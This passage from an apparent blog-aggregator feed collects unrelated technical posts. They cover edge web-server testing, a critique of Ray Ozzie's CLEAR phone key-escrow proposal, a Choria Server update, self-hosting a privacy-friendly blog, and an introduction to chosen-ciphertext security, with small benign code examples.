5. The test runner performs all defined testing against the server response. These tests can be very thorough: the test runner has access to the server response code, all headers, and the response body, and can thus confirm that all data returned meets each test’s specifications before concluding whether the process as a whole has passed or failed validation.

6. Specific to isolated testing: in some use cases, we may validate the state of the mock server, verifying that it has received all the calls we expected it to receive and that each call carried the data and headers expected.
This can be very useful for testing changes where our web layer has been configured to alter requests (rewrite, add or remove headers, etc.) prior to passing them to a given backend. Here is a diagram illustrating a test running in an isolated environment: An isolated testing environment

#### Acceptance Testing Walkthrough

When all of our tests have passed in our “isolated” environment, and we want to make sure our configurations work in a non-mock, physically “production-like” environment (or during our periodic acceptance test runs, which must also run in a production-mirroring environment), we use an “acceptance testing” mode. In this mode, we replace our mock server with a real production Haproxy load balancer instance talking to real production backends (or a subset of backends representing a real production application). Here is what happens during an acceptance test for the same hypothetical service foo.swiftype.com (registered in DNS as 1.2.3.4):

1. We automatically assign 1.2.3.4 as an alias on a loopback interface.

2. We start a dedicated production Haproxy instance, with a configuration pointing to production backend applications, and bind this dedicated haproxy instance to localhost. (This exactly mirrors what we do in production, where haproxy is always a dedicated localhost service.)

3. Our test performs DNS resolution for foo.swiftype.com, receives 1.2.3.4 as the IP of the service, connects to a local Nginx instance listening on 1.2.3.4 (bound to a loopback interface), and performs a test call.

4. Nginx, receiving the test request, performs whatever operations are defined and forwards it to a local Haproxy backend, which in turn sends the request to a production application instance. When the call is complete, the result is returned by Nginx to the test runner.

5. The test runner performs all defined checks on the response and determines whether the call passes or fails the test.
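The per-call validation in step 5 of both walkthroughs can be sketched as a small Ruby helper. The expectations hash and field names here are illustrative, not Swiftype’s real RSpec framework:

```ruby
require "json"

# Check a response's status, headers and body against per-test
# expectations; an empty failures array means the call passed.
def validate_edge_response(status:, headers:, body:, expect:)
  failures = []
  failures << "status #{status} != #{expect[:status]}" if status != expect[:status]

  (expect[:headers] || {}).each do |name, value|
    failures << "header #{name.inspect} != #{value.inspect}" if headers[name] != value
  end

  if expect[:body_keys]
    parsed = begin
      JSON.parse(body)
    rescue JSON::ParserError
      nil
    end
    if parsed.nil?
      failures << "body is not valid JSON"
    else
      expect[:body_keys].each do |key|
        failures << "body missing key #{key.inspect}" unless parsed.key?(key)
      end
    end
  end

  failures
end

failures = validate_edge_response(
  status:  200,
  headers: { "x-served-by" => "edge-1" },
  body:    '{"results": []}',
  expect:  { status: 200,
             headers: { "x-served-by" => "edge-1" },
             body_keys: ["results"] }
)
puts failures.empty? ? "PASS" : failures.join("; ")
```

The real runner wraps checks like these in RSpec matchers, but the pass/fail decision reduces to the same three comparisons.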
Here is a diagram illustrating a test call made in an acceptance testing environment: A test call within the acceptance testing environment

### Conclusion

Using our edge web server testing framework for the past few years, we have been able to perform hundreds of high-risk changes in our production edge infrastructure without any significant incident caused by the deployment of an untested configuration update. Our testing framework provides the assurance we need to make very dramatic changes to our web application edge routing (services that affect every production request) with confidence that we can introduce these changes safely. We highly recommend that every engineering team tasked with building or operating complex edge server configurations adopt some level of testing that allows the team to iterate faster without fear of compromising these critical components.

## April 26, 2018

### Cryptography Engineering

#### A few thoughts on Ray Ozzie’s “Clear” Proposal

Yesterday I happened upon a Wired piece by Steven Levy that covers Ray Ozzie’s proposal for “CLEAR”. I’m quoted at the end of the piece (saying nothing much), so I knew the piece was coming. But since many of the things I said to Levy were fairly skeptical — and most didn’t make it into the piece — I figured it might be worthwhile to say a few of them here. Ozzie’s proposal is effectively a key escrow system for encrypted phones. It’s receiving attention now because Ozzie has a stellar reputation in the industry, and because it has been lauded by law enforcement (and some famous people like Bill Gates). Ozzie’s idea is just the latest bit of news in this second edition of the “Crypto Wars”, in which the FBI and various law enforcement agencies have been arguing for access to end-to-end encryption technologies — like phone storage and messaging — in the face of pretty strenuous opposition from (most of) the tech community.
In this post I’m going to sketch a few thoughts about Ozzie’s proposal, and about the debate in general. Since this is a cryptography blog, I’m mainly going to stick to the technical and avoid the policy details (which are substantial). Also, since the full details of Ozzie’s proposal aren’t yet public — some are explained in the Levy piece and some in this patent — please forgive me if I get a few details wrong. I’ll gladly correct. [Note: I’ve updated this post in several places in response to some feedback from Ray Ozzie. For the updated parts, look for the *. Also, Ozzie has posted some slides about his proposal.]

### How to Encrypt a Phone

The Ozzie proposal doesn’t try to tackle every form of encrypted data. Instead it focuses like a laser on the simple issue of encrypted phone storage. This is something that law enforcement has been extremely concerned about. It also represents the (relatively) low-hanging fruit of the crypto debate, for essentially two reasons: (1) there are only a few phone hardware manufacturers, and (2) access to an encrypted phone generally only takes place after law enforcement has gained physical access to it. I’ve written about the details of encrypted phone storage in a couple of previous posts. A quick recap: most phone operating systems encrypt a large fraction of the data stored on your device. They do this using an encryption key that is (typically) derived from the user’s passcode. Many recent phones also strengthen this key by “tangling” it with secrets stored within the phone itself — typically with the assistance of a secure processor included in the phone. This further strengthens the device against simple password-guessing attacks. The upshot is that the FBI and local law enforcement have not — until very recently (more on that further below) — been able to obtain access to many of the phones they’ve obtained during investigations.
This is due to the fact that, by making the encryption key a function of the user’s passcode, manufacturers like Apple have effectively rendered themselves unable to assist law enforcement.

### The Ozzie Escrow Proposal

Ozzie’s proposal is called “Clear”, and it’s fairly straightforward. Effectively, it calls for manufacturers (e.g., Apple) to deliberately put themselves back in the loop. To do this, Ozzie proposes a simple form of key escrow (or “passcode escrow”). I’m going to use Apple as our example in this discussion, but obviously the proposal will apply to other manufacturers as well. Ozzie’s proposal works like this:

1. Prior to manufacturing a phone, Apple will generate a public and secret “keypair” for some public-key encryption scheme. They’ll install the public key into the phone, and keep the secret key in a “vault” where hopefully it will never be needed.

2. When a user sets a new passcode on their phone, the phone will encrypt a passcode under the Apple-provided public key. This won’t necessarily be the user’s passcode, but it will be an equivalent passcode that can unlock the phone.* It will store the encrypted result in the phone’s storage.

3. In the unlikely event that the FBI (or police) obtain the phone and need to access its files, they’ll place the phone into some form of law enforcement recovery mode. Ozzie describes doing this with some special gesture, or “twist”. Alternatively, Ozzie says that Apple itself could do something more complicated, such as performing an interactive challenge/response with the phone in order to verify that it’s in the FBI’s possession.

4. The phone will now hand the encrypted passcode to law enforcement. (In his patent, Ozzie suggests it might be displayed as a barcode on a screen.)

5. The law enforcement agency will send this data to Apple, who will do a bunch of checks (to make sure this is a real phone and isn’t in the hands of criminals). Apple will access their secret key vault, and decrypt the passcode.
They can then send this back to the FBI.

6. Once the FBI enters this code, the phone will be “bricked”. Let me be more specific: Ozzie proposes that once activated, a secure chip inside the phone will permanently “blow” several JTAG fuses monitored by the OS, placing the phone into a locked mode. Once it reads those fuses as blown, the OS will never again overwrite its own storage, will never again talk to any network, and will become effectively unable to operate as a normal phone.

When put into its essential form, this all seems pretty simple. That’s because it is. In fact, with the exception of the fancy “phone bricking” stuff in step (6), Ozzie’s proposal is a straightforward example of key escrow — a proposal that people have been making in various guises for many years. The devil is always in the details.

### A vault of secrets

If we picture how the Ozzie proposal will change things for phone manufacturers, the most obvious new element is the key vault. This is not a metaphor. It literally refers to a giant, ultra-secure vault that will have to be maintained individually by each phone manufacturer. The security of this vault is no laughing matter, because it will ultimately store the master encryption key(s) for every single device that manufacturer ever makes. For Apple alone, that’s about a billion active devices. Does this vault sound like it might become a target for organized criminals and well-funded foreign intelligence agencies? If it sounds that way to you, then you’ve hit on one of the most challenging problems with deploying key escrow systems at this scale. Centralized key repositories — ones that can decrypt every phone in the world — are basically a magnet for the sort of attackers you absolutely don’t want to be forced to defend yourself against. So let’s be clear.
Ozzie’s proposal relies fundamentally on the ability of manufacturers to secure extremely valuable key material for a massive number of devices against the strongest and most resourceful attackers on the planet. And not just rich companies like Apple. We’re also talking about the companies that make inexpensive phones and have thinner profit margins, and about many foreign-owned companies like ZTE and Samsung. This is key material that will be subject to near-constant access by the manufacturer’s employees, who will have to use these keys regularly in order to satisfy what may be thousands of law enforcement access requests every month. If a single attacker ever gains access to that vault and is able to extract a few “master” secret keys (Ozzie says that these master keys will be relatively small in size*), then the attackers will gain unencrypted access to every device in the world. Even better: if the attackers can do this surreptitiously, you’ll never know they did it.

Now in fairness, this element of Ozzie’s proposal isn’t really new. In fact, this key storage issue is an inherent aspect of all massive-scale key escrow proposals. In the general case, the people who argue in favor of such proposals typically make two arguments:

1. We already store lots of secret keys — for example, software signing keys — and things work out fine. So this isn’t really a new thing.

2. Hardware Security Modules.

Let’s take these one at a time. It is certainly true that software manufacturers do store secret keys, with varying degrees of success. For example, many software manufacturers (including Apple) store secret keys that they use to sign software updates. These keys are generally locked up in various ways, and are accessed periodically in order to sign new software. In theory they can be stored in hardened vaults, with biometric access controls (as the vaults Ozzie describes would have to be). But this is pretty much where the similarity ends.
You don’t have to be a technical genius to recognize that there’s a world of difference between a key that gets accessed once every month — and can be revoked if it’s discovered in the wild — and a key that may be accessed dozens of times per day and will be effectively undetectable if it’s captured by a sophisticated adversary.

Moreover, signing keys leak all the time. The phenomenon is so common that journalists have given it a name: “Stuxnet-style code signing”. The name derives from the fact that the Stuxnet malware — the nation-state malware used to sabotage Iran’s nuclear program — was authenticated with valid code signing keys, many of which were (presumably) stolen from various software vendors. This practice hasn’t remained with nation states, unfortunately, and has now become common in retail malware.

The folks who argue in favor of key escrow proposals generally propose that these keys can be stored securely in special devices called Hardware Security Modules (HSMs). Many HSMs are quite solid. They are not magic, however, and they are certainly not up to the threat model that a massive-scale key escrow system would expose them to. Rather than being invulnerable, they continue to cough up vulnerabilities like this one. A single such vulnerability could be game-over for any key escrow system that used it. In some follow-up emails, Ozzie suggests that keys could be “rotated” periodically, ensuring that even after a key compromise the system could eventually renew its security. He also emphasizes the security mechanisms (such as biometric access controls) that would be present in such a vault. I think these are certainly valuable and necessary protections, but I’m not convinced that they would be sufficient.

### Assume a secure processor

Let’s suppose for a second that an attacker does get access to the Apple (or Samsung, or ZTE) key vault. In the section above I addressed the likelihood of such an attack. Now let’s talk about the impact.
Ozzie’s proposal has one significant countermeasure against an attacker who wants to use these stolen keys to illegally spy on (access) your phone. Specifically, should an attacker attempt to illegally access your phone, the phone will be effectively destroyed. This doesn’t protect you from having your files read — that horse has fled the stable — but it should alert you to the fact that something fishy is going on. This is better than nothing.

This measure is pretty important, and not only because it protects you against evil maid attacks. As far as I can tell, this protection is pretty much the only measure by which theft of the master decryption keys might ever be detected. So it had better work well. The details of how this might work aren’t very clear in Ozzie’s patent, but the Wired article describes it, quoting Ozzie’s presentation at Columbia University. What Ozzie appears to describe here is a secure processor contained within every phone. This processor would be capable of securely and irreversibly enforcing that, once law enforcement has accessed a phone, that phone could no longer be placed into an operational state. My concern with this part of Ozzie’s proposal is fairly simple: this processor does not currently exist. To explain why, let me tell a story.

Back in 2013, Apple began installing a secure processor in each of their phones. While this secure processor (called the Secure Enclave Processor, or SEP) is not exactly the same as the one Ozzie proposes, the overall security architecture seems very similar. One main goal of Apple’s SEP was to limit the number of passcode-guessing attempts that a user could make against a locked iPhone. In short, it was designed to keep a counter of each (failed) login attempt. If the number of attempts got too high, the SEP would make the user wait a while — in the best case — or actively destroy the phone’s keys.
This last protection is effectively identical to Ozzie’s proposal. (With some modest differences: Ozzie proposes to “blow fuses” in the phone, rather than erasing a key; and he suggests that this event would be triggered by entry of a recovery passcode.*)

For several years, the SEP appeared to do its job fairly effectively. Then in 2017, everything went wrong. Two firms, Cellebrite and Grayshift, announced that they had products that effectively unlocked every single Apple phone, without any need to dismantle it. Digging into the details of this exploit, it seems very clear that both firms — working independently — have found software exploits that somehow disable the protections that are supposed to be offered by the SEP. The cost of this exploit (to police and other law enforcement)? About $3,000-$5,000 per phone. Or (if you like to buy rather than rent) about $15,000. Also, just to add an element of comedy to the situation, the GrayKey source code appears to have recently been stolen. The attackers are extorting the company for two Bitcoin. Because 2018.

Let me sum up my point, in case I’m not beating you about the head quite enough:

The richest and most sophisticated phone manufacturer in the entire world tried to build a processor that achieved goals similar to those Ozzie requires. And as of April 2018, after five years of trying, they have been unable to achieve this goal: a goal that is critical to the security of the Ozzie proposal as I understand it.

Now obviously the lack of a secure processor today doesn’t mean such a processor will never exist. However, let me propose a general rule: if your proposal fundamentally relies on a secure lock that nobody can ever break, then it’s on you to show me how to build that lock.

### Conclusion

While this mainly concludes my notes on Ozzie’s proposal, I want to conclude this post with a side note: a response to something I routinely hear from folks in the law enforcement community. This is the criticism that cryptographers are a bunch of naysayers who aren’t trying to solve “one of the most fundamental problems of our time”, and are instead just rejecting the problem with lazy claims that it “can’t work”.

As a researcher, my response to this is: phooey.

Cryptographers — myself most definitely included — love to solve crazy problems. We do this all the time. You want us to deploy a new cryptocurrency? No problem! Want us to build a system that conducts a sugar-beet auction using advanced multiparty computation techniques? Awesome. We’re there. No problem at all.

But there’s crazy and there’s crazy.

The reason so few of us are willing to bet on massive-scale key escrow systems is that we’ve thought about it and we don’t think it will work. We’ve looked at the threat model, the usage model, and the quality of hardware and software that exists today. Our informed opinion is that there’s no detection system for key theft, there’s no renewability system, HSMs are terrifically vulnerable (and the companies that make them are largely staffed with ex-intelligence employees), and insiders can be suborned. We’re not going to put the data of a few billion people on the line in an environment where we believe with high probability that the system will fail.

Maybe that’s unreasonable. If so, I can live with that.

## April 25, 2018

### R.I.Pienaar

#### Choria Progress Update

It’s been a while since my previous update and quite a bit has happened since.

## Choria Server

As previously mentioned, the Choria Server aims to replace mcollectived eventually. Thus far I was focussed on its registration subsystem, Golang-based MCollective RPC compatible agents, and being able to embed it into other software for IoT and management backplanes.

Over the last few weeks I learned that MCollective will no longer be shipped in Puppet Agent version 6, which is currently due around Fall 2018. This means we have to accelerate making Choria standalone in its own right.

A number of things have to happen to get there:

• Choria Server should support Ruby agents
• The Ruby libraries Choria Server needs either need to be embedded and placed dynamically or provided via a Gem
• The Ruby client needs to be provided via a Gem
• New locations for these Ruby parts are needed outside of AIO Ruby

Yesterday I released the first step in this direction: you can now replace mcollectived with Choria Server. For now I am marking this as a preview/beta feature while we deal with issues the community finds.

The way this works is that we provide a small shim that uses just enough of MCollective to get the RPC framework running – luckily Choria was initially developed as a MCollective plugin and it retained a quite separate code base. When the Go code needs to invoke a Ruby agent it will call the shim to do so, and the shim in turn will provide the result from the agent – in JSON format – back to Go.
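The contract between the two worlds is simply JSON in, JSON out. A rough Ruby sketch of the shim idea is below; the envelope fields and the toy agent are illustrative, not the actual Choria shim protocol:

```ruby
require "json"

# A toy agent standing in for a Ruby MCollective agent: a single action
# implemented as a plain method taking and returning Hashes.
module PackageAgent
  def self.status(request)
    { "package" => request["package"], "ensure" => "installed" }
  end
end

AGENTS = { "package" => PackageAgent }.freeze

# The shim's job in one function: the Go server hands over a JSON
# request (agent, action, data) and reads a JSON reply back.
def handle_rpc(json_request)
  request = JSON.parse(json_request)
  agent   = AGENTS.fetch(request["agent"])
  result  = agent.public_send(request["action"], request["data"] || {})
  JSON.generate("statuscode" => 0, "data" => result)
rescue KeyError, NoMethodError => e
  # Unknown agent or action: report failure in the reply envelope.
  JSON.generate("statuscode" => 1, "statusmsg" => e.message)
end

reply = handle_rpc('{"agent":"package","action":"status","data":{"package":"zsh"}}')
puts reply
```

In the real setup the shim is spawned as a separate process per request, which is also why the Go server's memory footprint stays flat.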

This works for me with any agent I’ve tried it with and I am quite pleased with the results:

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 10820 0.0 1.1 1306584 47436 ? Sl 13:50 0:06 /opt/puppetlabs/puppet/bin/ruby /opt/puppetlabs/puppet/bin/mcollectived

MCollective would of course pull in the whole of Puppet as soon as any agent that uses Puppet is loaded – service, package, puppet – and so over time things only get worse. Here is Choria:

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 32396 0.0 0.5 296436 9732 ? Ssl 16:07 0:03 /usr/sbin/choria server --config=/etc/choria/server.conf

I run a couple hundred thousand invocations of this and this is what you get; it never really changes. This is because Choria spawns the Ruby code as a separate process, which exits when done.

This has an unfortunate side effect: the service, package and puppet agents are around 1 second slower per invocation, because loading Puppet is really slow. Agents that do not load Puppet are only marginally slower.

irb(main):002:0> Benchmark.measure { require "puppet" }.real
=> 0.619865644723177

There is a page set up dedicated to the Beta that details how to run it and what to look out for.

## JSON pure protocol

Some of the breakage you might run into – like mco facts not working with Choria Server – is due to a hugely significant change in the background. Choria – both plugged into MCollective and standalone – is JSON safe. The Ruby plugin is optionally so (and off by default), but the Choria daemon only supports JSON.

Traditionally MCollective has used YAML on the wire. The project being quite old, JSON was really not that big a deal back in the early 2000s when the foundation for this choice was laid down; XML was more important. Worse, MCollective has exposed Ruby-specific data types and YAML extensions on the wire, which has made creating cross-platform support nearly impossible.

YAML is also of course capable of carrying arbitrary objects – which means some agents are just never going to be compatible with anything but Ruby. This was the case with the process agent, but I fixed that before shipping it in Choria. It also means deserializing YAML can instantiate things you might not have anticipated, which is how big security problems happen.

For quite some time now the Choria protocol has been defined and versioned, and JSON schemas are available. The protocol makes the separation between Payload, Security, Transport and Federation much clearer, and it can now be carried by anything that can move JSON – Middleware, REST, SSH, Postal Doves are all capable of carrying Choria packets.
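To illustrate what a versioned JSON wire format buys you, here is a small Ruby sketch of validating a packet's basic shape before touching it; any language with a JSON parser can do the same. The field names are illustrative, not the actual Choria schemas:

```ruby
require "json"

# Required fields and their types for our hypothetical packet layout.
REQUIRED = {
  "protocol"  => String,  # a versioned marker, e.g. "choria:request:1"
  "message"   => String,  # the serialized payload
  "requestid" => String,
  "senderid"  => String,
}.freeze

# A packet is acceptable if it is a JSON object, carries every required
# field with the right type, and declares a protocol we recognize.
def valid_packet?(raw)
  packet = JSON.parse(raw)
  return false unless packet.is_a?(Hash)
  REQUIRED.all? { |field, type| packet[field].is_a?(type) } &&
    packet["protocol"].start_with?("choria:")
rescue JSON::ParserError
  false
end

good = JSON.generate(
  "protocol"  => "choria:request:1",
  "message"   => '{"agent":"rpcutil"}',
  "requestid" => "abc123",
  "senderid"  => "node1.example.net"
)
puts valid_packet?(good)        # true
puts valid_packet?("not json")  # false
```

The real protocol goes further with published JSON schemas, but structural validation like this is what makes cross-language implementations practical.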

There is a separate Golang implementation of the protocol that is transport agnostic and the schemas are there. Version 1 of the protocol is a tad skewed to MCollective but Version 2 (not yet planned) will drop those shackles. A single Choria Server is capable of serving multiple versions of the network protocol and communicate with old and new clients.

Golang being a static language, and having a really solid and completely compatible implementation of the protocol, means making implementations for other languages like Python will not be hard. However, I think the better long-term option for other languages is still a capable REST gateway.

I did some POC work on a very light weight protocol suitable for devices like Arduino, and will provide bridging between the worlds in our Federation Brokers. You’ll be able to mco rpc wallplug off; your client will talk full Choria Protocol while the wall plug speaks a super light weight MQTT-based protocol, and you will not even know it.

There are some gotchas as a result of these changes, also captured in the Choria Server evaluation documentation. To resolve some of these I need to be much more aggressive with what I do to the MCollective libraries, something I can do once they are liberated out of Puppet Agent.

## April 23, 2018

### Vincent Bernat

#### A more privacy-friendly blog

When I started this blog, I embraced some free services, like Disqus or Google Analytics. These services are quite invasive for users’ privacy. Over the years, I have tried to correct this to reach a point where I do not rely on any “privacy-hostile” services.

# Analytics⚓︎

I opted for a simpler solution: no analytics. It also enables me to think that my blog attracts thousands of visitors every day.

# Fonts⚓︎

Google Fonts is a very popular font library and hosting service, which relies on the generic Google Privacy Policy. The google-webfonts-helper service makes it easy to self-host any font from Google Fonts. Moreover, with help from pyftsubset, I include only the characters used in this blog. The font files are lighter and more complete: no problem spelling “Antonín Dvořák”.

# Videos⚓︎

• Before: YouTube
• After: self-hosted

Some articles are supported by a video (like “OPL2LPT: an AdLib sound card for the parallel port“). In the past, I was using YouTube, mostly because it was the only free platform with an option to disable ads. Streaming on-demand videos is usually deemed quite difficult. For example, if you just use the <video> tag, you may push too big a video for people with a slow connection. However, it is not that hard, thanks to hls.js, which makes it possible to deliver video sliced into segments available at different bitrates. Users with Java­Script disabled are still served a progressive version of medium quality.

In “Self-hosted videos with HLS”, I explain this approach in more detail.

# Comments⚓︎

For some time, I thought about implementing my own comment system around Atom feeds. Each page would get its own feed of comments. A piece of Java­Script would turn these feeds into HTML, and comments could still be read without Java­Script, thanks to the default rendering provided by browsers. People could also subscribe to these feeds: no need for mail notifications! The feeds would be served as static files and updated on new comments by a small piece of server-side code. Again, this could work without Java­Script.
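The server-side half of that idea fits in a few lines. Here is a hedged Ruby sketch of regenerating a page's static Atom comment feed (the names and URLs are made up for illustration):

```ruby
require "cgi"
require "time"

# Build one static Atom feed for a page's comments: plain XML that
# browsers render by default, feed readers can subscribe to, and a
# small piece of server-side code regenerates on each new comment.
def comments_feed(page_url, comments)
  entries = comments.map do |c|
    <<~ENTRY
      <entry>
        <title>Comment by #{CGI.escapeHTML(c[:author])}</title>
        <id>#{page_url}#comment-#{c[:id]}</id>
        <updated>#{c[:date].utc.iso8601}</updated>
        <content type="html">#{CGI.escapeHTML(c[:html])}</content>
      </entry>
    ENTRY
  end

  <<~FEED
    <?xml version="1.0" encoding="utf-8"?>
    <feed xmlns="http://www.w3.org/2005/Atom">
      <title>Comments for #{CGI.escapeHTML(page_url)}</title>
      <id>#{page_url}#comments</id>
      <updated>#{Time.now.utc.iso8601}</updated>
      #{entries.join}
    </feed>
  FEED
end

feed = comments_feed("https://example.net/post",
  [{ id: 1, author: "Alice", date: Time.utc(2018, 4, 23), html: "<p>Nice!</p>" }])
puts feed
```

The comment HTML is escaped into the `<content type="html">` element, which is how Atom carries pre-rendered markup safely.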

I still think this is a great idea. But I didn’t feel like developing and maintaining a new comment system. There are several self-hosted alternatives, notably Isso and Commento. Isso is a bit more featureful, notably with an (imperfect) import from Disqus. Both are struggling with maintenance and are trying to become sustainable with a paid hosted version.1 Commento is more privacy-friendly as it doesn’t use cookies at all. However, the cookies from Isso are not essential and can be filtered with nginx:

proxy_hide_header Set-Cookie;


Isso currently has no mail notifications, but I have added an Atom feed for each comment thread.

Another option would have been to not provide comments anymore. However, I had some great contributions as comments in the past and I also think they can work as some kind of peer review for blog articles: they are a weak guarantee that the content is not totally wrong.

# Search engine⚓︎

A way to provide a search engine for a personal blog is to provide a form for a public search engine, like Google. That’s what I did. I also slapped some Java­Script on top of that to make it look like not Google.

The solution here is easy: switch to DuckDuckGo, which lets you customize a bit the search experience:

<form id="lf-search" action="https://duckduckgo.com/">
<input type="hidden" name="kf" value="-1">
<input type="hidden" name="kaf" value="1">
<input type="hidden" name="k1" value="-1">
<input type="hidden" name="sites" value="vincent.bernat.im/en">
<input type="submit" value="">
<input type="text" name="q" value="" autocomplete="off" aria-label="Search">
</form>


The Java­Script part is also removed, as DuckDuckGo doesn’t provide an API. Since it is unlikely that more than three people a year will use the search engine, it seems a good idea not to spend too much time on this non-essential feature.

# Newsletter⚓︎

MailChimp is a common solution to send newsletters. It provides a simple integration with RSS feeds to trigger a mail each time new items are added to the feed. From a privacy point of view, MailChimp seems a good citizen: data collection is mainly limited to the amount needed to operate the service. Privacy-conscious users can still avoid this service and use the RSS feed.

# Less Java­Script⚓︎

• Before: third-party Java­Script code
• After: self-hosted Java­Script code

Many privacy-conscious people are disabling Java­Script or using extensions like uMatrix or NoScript. Except for comments, I was using Java­Script only for non-essential stuff:

For mathematical formulae, I have switched from MathJax to KaTeX. The latter is faster but also enables server-side rendering: it produces the same output regardless of browser. Therefore, client-side Java­Script is not needed anymore.

For sidenotes, I have turned the Java­Script code doing the transformation into Python code, with pyquery. No more client-side Java­Script for this aspect either.

The remaining code is still here but is self-hosted.

# Memento: CSP⚓︎

The HTTP Content-Security-Policy header controls the resources that a user agent is allowed to load for a given page. It is a safeguard and a memento for the external resources a site will use. Mine is moderately complex and shows what to expect from a privacy point of view:3

Content-Security-Policy:
default-src 'self' blob:;
script-src  'self' blob: https://d1g3mdmxf8zbo9.cloudfront.net/js/;
object-src  'self' https://d1g3mdmxf8zbo9.cloudfront.net/images/;
img-src     'self' data: https://d1g3mdmxf8zbo9.cloudfront.net/images/;
frame-src   https://d1g3mdmxf8zbo9.cloudfront.net/images/;
style-src   'self' 'unsafe-inline' https://d1g3mdmxf8zbo9.cloudfront.net/css/;
worker-src  blob:;
media-src   'self' blob: https://luffy-video.sos-ch-dk-2.exo.io;
frame-ancestors 'none';
block-all-mixed-content;
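A policy like this is also easy to audit mechanically. A minimal, illustrative parser (my own helper, not tied to any framework) splits the header value into per-directive source lists:

```python
def parse_csp(header):
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    policy = {}
    for chunk in header.split(';'):
        parts = chunk.split()
        if parts:
            policy[parts[0]] = parts[1:]
    return policy

policy = parse_csp("default-src 'self' blob:; frame-ancestors 'none'; block-all-mixed-content")
# → {'default-src': ["'self'", 'blob:'], 'frame-ancestors': ["'none'"],
#    'block-all-mixed-content': []}
```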


I am quite happy having been able to reach this result. 😊

1. For Isso, look at comment.sh. For Commento, look at commento.io. ↩︎

2. You may have noticed I am a footnote sicko and use them all the time for pointless stuff. ↩︎

3. I don’t have an issue with using a CDN like CloudFront: it is a paid service and Amazon AWS is not in the business of tracking users. ↩︎

## April 21, 2018

### Cryptography Engineering

#### Wonk post: chosen ciphertext security in public-key encryption (Part 1)

In general I try to limit this blog to posts that focus on generally-applicable techniques in cryptography. That is, I don’t focus on the deeply wonky. But this post is going to be an exception. Specifically, I’m going to talk about a topic that most “typical” implementers don’t — and shouldn’t — think about.

Specifically: I’m going to talk about various techniques for making public key encryption schemes chosen ciphertext secure. I see this as the kind of post that would have saved me ages of reading when I was a grad student, so I figured it wouldn’t hurt to write it all down.

### Background: CCA(1/2) security

Early (classical) ciphers used a relatively weak model of security, if they used one at all. That is, the typical security model for an encryption scheme was something like the following:

1. I generate an encryption key (or keypair for public-key encryption)
2. I give you the encryption of some message of my choice
3. You “win” if you can decrypt it

This is obviously not a great model in the real world, for several reasons. First off, in some cases the attacker knows a lot about the message to be decrypted. For example: it may come from a small space (like a set of playing cards). For this reason we require a stronger definition like “semantic security” that assumes the attacker can choose the plaintext distribution, and can also obtain the encryption of messages of his/her own choice. I’ve written more about this here.

More relevant to this post, another limitation of the above game is that — in some real-world examples — the attacker has even more power. That is: in addition to obtaining the encryption of chosen plaintexts, they may be able to convince the secret keyholder to decrypt chosen ciphertexts of their choice.

The latter attack is called a chosen-ciphertext (CCA) attack.

At first blush this seems like a really stupid model. If you can ask the keyholder to decrypt chosen ciphertexts, then isn’t the scheme just obviously broken? Can’t you just decrypt anything you want?

The answer, it turns out, is that there are many real-life examples where the attacker has decryption capability, but the scheme isn’t obviously broken. For example:

1. Sometimes an attacker can decrypt a limited set of ciphertexts (for example, because someone leaves the decryption machine unattended at lunchtime.) The question then is whether she can learn enough from this access to decrypt other ciphertexts that are generated after she loses access to the decryption machine — for example, messages that are encrypted after the operator comes back from lunch.
2. Sometimes an attacker can submit any ciphertext she wants — but will only obtain a partial decryption of the ciphertext. For example, she might learn only a single bit of information such as “did this ciphertext decrypt correctly”. The question, then, is whether she can leverage this tiny amount of data to fully decrypt some ciphertext of her choosing.

The first example is generally called a “non-adaptive” chosen ciphertext attack, or a CCA1 attack (and sometimes, historically, a “lunchtime” attack). There are a few encryption schemes that totally fall apart under this attack — the most famous textbook example is Rabin’s public key encryption scheme, which allows you to recover the full secret key from just a single chosen-ciphertext decryption.

The more powerful second example is generally referred to as an “adaptive” chosen ciphertext attack, or a CCA2 attack. The term refers to the idea that the attacker can select the ciphertexts they try to decrypt based on seeing a specific ciphertext that they want to attack, and by seeing the answers to specific decryption queries.

In this article we’re going to use the more powerful “adaptive” (CCA2) definition, because that subsumes the CCA1 definition. We’re also going to focus primarily on public-key encryption.

With this in mind, here is the intuitive definition of the experiment we want a CCA2 public-key encryption scheme to be able to survive:

1. I generate an encryption keypair for a public-key scheme and give you the public key.
2. You can send me (sequentially and adaptively) many ciphertexts, which I will decrypt with my secret key. I’ll give you the result of each decryption.
3. Eventually you’ll send me a pair of messages (of equal length) $M_0, M_1$ and I’ll pick a bit $b$ at random, and return to you the encryption of $M_b$, which I will denote as $C^* \leftarrow {\sf Encrypt}(pk, M_b)$.
4. You’ll repeat step (2), sending me ciphertexts to decrypt. If you send me $C^*$ I’ll reject your attempt. But I’ll decrypt any other ciphertext you send me, even if it’s only slightly different from $C^*$.
5. You output your guess $b'$, and “win” the game if $b'=b$.

We say that our scheme is secure if the attacker wins with probability at most negligibly greater than they would achieve by guessing $b'$ at random. Since random guessing wins the game with probability 1/2, that means we want (probability the attacker wins the game) – 1/2 to be “very small” (typically a negligible function of the security parameter).
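The game above can be phrased as a tiny harness. The scheme and adversary interfaces here are my own strawman, and the scheme shown is deliberately worthless (ciphertext equals plaintext) so that the adversary wins every run:

```python
import secrets

def cca2_game(keygen, encrypt, decrypt, adversary):
    """One run of a toy IND-CCA2 game; returns True if the adversary wins."""
    pk, sk = keygen()
    oracle = lambda c: decrypt(sk, c)          # phase 1: free decryption queries
    m0, m1 = adversary['choose'](pk, oracle)
    b = secrets.randbits(1)
    c_star = encrypt(pk, (m0, m1)[b])          # the challenge ciphertext
    def oracle2(c):                            # phase 2: C* itself is refused
        if c == c_star:
            raise ValueError("may not decrypt the challenge ciphertext")
        return decrypt(sk, c)
    return adversary['guess'](c_star, oracle2) == b

# A scheme with no security at all: "encryption" is the identity function.
keygen  = lambda: (None, None)
encrypt = lambda pk, m: m
decrypt = lambda sk, c: c

adversary = {
    'choose': lambda pk, oracle: (b'zero', b'one'),
    'guess':  lambda c_star, oracle: 1 if c_star == b'one' else 0,
}

assert all(cca2_game(keygen, encrypt, decrypt, adversary) for _ in range(20))
```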

You should notice two things about this definition. First, it gives the attacker the full decryption of any ciphertext they send me. This is obviously much more powerful than just giving the attacker a single bit of information, as we mentioned in the example further above. But note that powerful is good. If our scheme can remain secure in this powerful experiment, then clearly it will be secure in a setting where the attacker gets strictly less information from each decryption query.

